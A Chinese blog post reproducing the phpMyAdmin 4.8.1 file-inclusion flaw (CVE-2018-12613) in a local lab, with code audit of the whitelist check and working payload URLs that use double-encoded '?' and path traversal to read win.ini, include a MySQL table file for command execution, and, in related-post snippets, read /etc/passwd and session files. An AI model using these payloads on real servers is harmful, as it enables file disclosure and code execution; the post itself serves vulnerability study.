phpmyadmin 4.8.1 文件包含漏

最新推荐文章于 2024-02-16 01:08:24 发布
最新推荐文章于 2024-02-16 01:08:24 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84839906
版权

一、 启动环境

1.双击运行桌面phpstudy.exe软件
在这里插入图片描述
2.点击启动按钮,启动服务器环境

二、代码审计

1.双击启动桌面Seay源代码审计系统软件

在这里插入图片描述
3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\phpmyadmin),点击确定

漏洞分析

1.双击index.php页面,将鼠标滚动到页面第53行

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];//此处!!
    exit;
}

可以看到其中包含target参数过来的变量,包含过程并没有任何过滤。
2.目前漏洞利用的关键能够绕过if判断,首先判断target参数是否是字符串,再检测target不能以index开头,然后在判断target参数不能在$target_blacklist数组里面,数组内容

$target_blacklist = array (
    'import.php', 'export.php'
);

3.前三个条件可以轻松绕过,最后需要进入到Core类中的checkPageValidity进行检查
/libraries/classes/Core.php

public static function checkPageValidity(&$page, array $whitelist = [])
{
   if (empty($whitelist)) {
       $whitelist = self::$goto_whitelist;
   }
   if (! isset($page) || !is_string($page)) {
       return false;
   }

   if (in_array($page, $whitelist)) {
       return true;
   }

   $_page = mb_substr(
       $page,
       0,
       mb_strpos($page . '?', '?')
   );
   if (in_array($_page, $whitelist)) {
       return true;
   }

   $_page = urldecode($page);//问题出在这里
   $_page = mb_substr(
       $_page,
       0,
       mb_strpos($_page . '?', '?')
   );
   if (in_array($_page, $whitelist)) {
       return true;
   }

   return false;
}

绕过这个方法检查的关键在于程序对传入的target进行了进行了解码,我们可以完全按照二次编码绕过方法检查。

漏洞利用

1.访问ip/phpmyadmin/index.php,然后登陆页面
2.输入攻击payload

phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/win.ini

3.攻击结果
在这里插入图片描述
查看数据库存放的物理位置

show global variables like "%datadir%";

在这里插入图片描述

向表中插入一条数据

在这里插入图片描述
在这里插入图片描述
访问

http://192.168.91.136/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/test.MYD

在这里插入图片描述
插入命令执行
在这里插入图片描述
结果
在这里插入图片描述

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpMyAdmin v4.8.1
10-12
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpmyadmin洞_四十,phpMyAdmin 4.8.1后台文件包含洞复现及详解
weixin_39981400的博客
11-27 432
一.phpMyAdmin环境配置PS:前面两部分内容会简单讲解phpMyAdmin 4.8.1版本配置过程,如果读者只想了解洞,可以从第三部分开始阅读。还请见谅~phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,下面详细说明该工具的安装方法。第一步,下载php...
phpmyadmin 4.8.1(cve-2018-12613)
Z_l123的博客
02-28 274
洞原理 来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试 1.登录phpmyadmin 2.index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 3.查询<?php phpinfo();?> 4.查看sessionid(cookie中phpMyAdmin的值) 5.访问http://ip/?target=db_sql.php%253f..
文件包含洞--phpMyAdmin 4.8.1
最新发布
xiesiyuan1的博客
02-16 839
需要同时满足条件(参数target不为空、是字符串、不以index开头(此时如果需要加载index文件去绕过,可尝试使用xxx/../index.php)、不在数组target_blacklist中(此处也可以用xxx/../index.php的方式绕过 )、在checkPageValidity()函数中返回真)才能得到参数。因为此靶场可以对数据库直接操作,我们可以直接查找数据库文件(/MySql/data/数据库名/表名.frm),并且直接新建表,将字段名命名为一句话木马,从而将一句话木马包含进去。
渗透测试-PhpMyAdmin后台文件包含
道阻且长,行则将至。
08-10 6166
洞背景 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含洞。 实训目标 1、了解此洞形成的原因; 2、掌握此洞的利用方式。 解题方向 根据洞编号找到相关知识。 攻击过程 墨者学院在线靶机:http://219.153.49.228:49400/index.php 直接...
phpmyadminV4.8.1本地文件包含洞复现
seek_2022的博客
07-05 2569
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含洞,通过代码审计结合本地搭建测试环境的方式进行洞复现研究,以供大家参考学习。
phpmyadmin4.8.1远程文件包含洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2583
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpMyAdmin4.8.1
07-06
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料...
phpMyAdmin配置文件config 详解.doc
01-12
phpMyAdmin配置文件config 详解
phpmyadmin 4.8.1 远程文件包含洞(CVE-2018-12613)
千寻的博客
03-14 1119
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。攻击者可利用该洞包含(查看并可能执行)服务器上的文件。
phpMyAdmin4.8.1洞复现及利用
qq_43579362的博客
09-08 1968
一.环境配置 我采用的是Windows+phpstudy配置的运行环境,将phpMyAdmin4.8.1下载好解压到phpstudy网站根目录即可,这里需要注意的是php版本和Mysql的版本 配置好后,直接访问http://localhost/phpMyAdmin 登陆成功成功后你会遇到下图 解决方法: 修改phpMyAdmin/libraries文件下的config.default.php里面的$cfg['blowfish_secret']配置,随意修改保存即可,长度一定要达到要求。 二.洞复
phpmyadmin 4.8.1 远程文件包含
永不垂头的博客
08-14 449
phpmyadmin 4.8.1 远程文件包含洞 文章目录phpmyadmin 4.8.1 远程文件包含洞一、洞详情二、洞复现1.任意文件包含2.任意代码执行3.向数据库写入php代码4.包函session文件三、我的公众号 一、洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
热门推荐
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
phpMyAdmin 4.8.x 最新版 本地文件包含洞利用
Ambulong的博客
06-21 5950
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含洞:phpmyadmin4.8.1后台getshell。该洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该洞的利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
phpMyAdmin4.8.1 文件包含
测试
07-07 1560
起因一个很简单的洞, 分析的文章也都出来了很多, 但是看了那些文章, 我一直搞不懂为啥问号要双重url编码, 我自己看那些文章感觉不编码应该也能成功利用的。 并且好像大家对问号编码的说法各有不同。 还是自己下载了份源码看了一下。 4.8.1下载地址:https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-lan...
phpmyadmin4.8.1洞复现-远程文件包含
weixin_54555816的博客
04-10 4258
phpMyAdmin4.8.0 - 4.8.1版本均受洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
phpmyadmin 4.8.1任意文件包含(CVE-2018-12613)
笑花大王
03-27 332
简介 环境复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含洞(phpmyadmin 4.8.1任意文件包含) 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程...
CVE-2018-12613 PhpMyadmin后台文件包含分析
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的洞被发现。该洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
phpmyadmin导入sql文件
08-25
当使用phpMyAdmin导入SQL文件时,可能会遇到一些问题。根据引用,如果您的数据库大于2M,则无法直接导入。为了解决这个问题,您可以考虑以下几个方法: 1. 使用命令行导入:通过命令行工具,您可以使用MySQL命令来导入大型SQL文件。这种方法可以绕过phpMyAdmin的限制。您可以使用以下命令导入SQL文件:mysql -u username -p database_name < file.sql,其中username是您的MySQL用户名,database_name是要导入到的数据库名,file.sql是要导入的SQL文件的路径。 2. 分割SQL文件:如果您无法使用命令行,您可以尝试将SQL文件分割成更小的部分,然后逐个导入。这样可以避免导入过大的文件。 3. 修改php.ini配置文件:如果您有权限访问服务器的php.ini配置文件,可以尝试增加上传文件的大小限制。找到并修改以下两个配置项的值:upload_max_filesize和post_max_size。将它们设置为适当的大小,以容纳您的SQL文件。 同时,根据引用和引用的内容,还有可能出现其他错误。请确保您的SQL文件的语法正确,并且与您的MySQL服务器版本兼容。如果遇到语法错误,请参考MySQL服务器文档查找正确的语法和用法。 希望以上方法对您有所帮助。如果您遇到其他问题,请提供更多详细信息,以便我能够更准确地为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [修改phpMyAdmin导入SQL文件的大小限制](https://download.csdn.net/download/weixin_38710557/14833172)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [求助,phpmyadmin导入sql文件提示1064错误](https://blog.csdn.net/weixin_35990295/article/details/116214022)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值